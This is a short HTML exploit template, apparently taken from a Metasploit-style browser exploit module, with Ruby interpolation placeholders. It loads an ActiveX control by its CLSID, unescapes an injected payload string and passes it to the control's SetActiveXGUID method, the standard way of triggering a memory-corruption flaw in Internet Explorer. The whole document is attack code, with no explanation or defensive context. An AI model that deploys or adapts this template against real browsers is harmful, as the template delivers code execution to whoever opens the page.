<html>
    <head>#{js}</head>
    <body>
    <object classid="clsid:D25FCAFC-F795-4609-89BB-5F78B4ACAF2C" id="#{obj_id}"></object>
    <script>
    var #{sploit_name} = unescape("#{sploit}");
    #{obj_id}.SetActiveXGUID(#{sploit_name});
    </script>
    </body>
    </html>